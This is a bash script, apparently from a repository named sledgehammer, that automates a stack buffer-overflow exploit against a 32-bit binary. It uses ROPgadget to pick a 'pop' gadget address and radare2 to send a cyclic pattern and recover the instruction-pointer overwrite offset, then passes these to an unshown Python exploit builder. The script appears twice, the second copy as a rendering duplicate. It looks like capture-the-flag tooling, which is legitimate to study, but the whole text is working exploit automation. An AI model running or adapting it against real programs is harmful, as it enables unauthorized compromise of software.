chriskout/sledgehammer.sh

## sledgehammer.sh
#!/bin/bash
line=$(ROPgadget --binary $1 | grep -x '.\{26\}' | grep -m 1 'pop')
echo $line
address=${line:0:10}
echo $address

ragg2 -P 200 -r > pattern.txt
echo "!/usr/bin/rarun2" > profile.rr2
echo "stdin=./pattern.txt" >> profile.rr2
exec 3>&1 1>r2log
r2 -r profile.rr2 -d $1 << EOF
dc
wopO \`dr eip\`
EOF

exec 1>&3 3>&-
cat r2log | tail -2 > offsetfile
head -1 offsetfile > r2log
offset=$(tail -c 4 r2log)
python3 sledgehammer.py $1 $address $offset
	#!/bin/bash
	line=$(ROPgadget --binary $1 \| grep -x '.\{26\}' \| grep -m 1 'pop')
	echo $line
	address=${line:0:10}
	echo $address

	ragg2 -P 200 -r > pattern.txt
	echo "!/usr/bin/rarun2" > profile.rr2
	echo "stdin=./pattern.txt" >> profile.rr2
	exec 3>&1 1>r2log
	r2 -r profile.rr2 -d $1 << EOF
	dc
	wopO \`dr eip\`
	EOF

	exec 1>&3 3>&-
	cat r2log \| tail -2 > offsetfile
	head -1 offsetfile > r2log
	offset=$(tail -c 4 r2log)
	python3 sledgehammer.py $1 $address $offset